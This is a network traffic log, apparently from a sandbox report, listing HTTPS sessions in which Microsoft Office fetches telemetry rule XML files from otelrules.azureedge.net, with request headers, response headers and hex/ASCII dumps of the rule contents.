2024-11-21 08:54:24 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.6	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:24 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:24 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:24 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 008b0be1-f01e-001f-587c-3b5dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085424Z-1777c6cb754j8gqphC1TEB5bf80000000awg000000000c3q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:24 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.6	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:24 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:24 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:24 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085424Z-1777c6cb7542p5p4hC1TEBq0980000000axg00000000373k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:24 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.6	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:24 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:24 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:24 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: fce879e9-f01e-0052-0d66-3b9224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085424Z-178bfbc474bp8mkvhC1NYCzqnn000000012g000000007uwd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:24 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.6	49856	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:25 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:26 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:26 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: d8182971-801e-0067-2581-3bfe30000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085426Z-1777c6cb754j47wfhC1TEB5wrw00000006mg00000000enh1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:26 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.6	49857	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:25 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:26 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:26 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085426Z-178bfbc474brk967hC1NYCfu6000000000y000000000e5m9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:26 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.6	49859	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:26 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:26 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:26 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: 5a6b30d1-101e-00a2-7c5b-3b9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085426Z-178bfbc474bbbqrhhC1NYCvw7400000001ag00000000atsv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:26 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.6	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:26 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:26 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:26 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085426Z-178bfbc474bkvpdnhC1NYCuu2w00000001b00000000068dw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:26 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.6	49860	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:26 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:27 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:26 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 4b825c62-901e-008f-3f5c-3b67a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085426Z-178bfbc474bq2pr7hC1NYCkfgg00000001c00000000077tn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:27 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.6	49861	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:28 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:28 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:28 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 231cc5cf-201e-0096-37f7-3aace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085428Z-r1d97b99577jlrkbhC1TEBq8d000000009z000000000a470 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:28 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.6	49862	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:28 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:28 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:28 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085428Z-178bfbc474bp8mkvhC1NYCzqnn000000010000000000cmsv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:28 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.6	49864	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:28 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:29 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:28 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085428Z-178bfbc474bh5zbqhC1NYCkdug0000000140000000009pn8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:29 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.6	49863	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:28 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
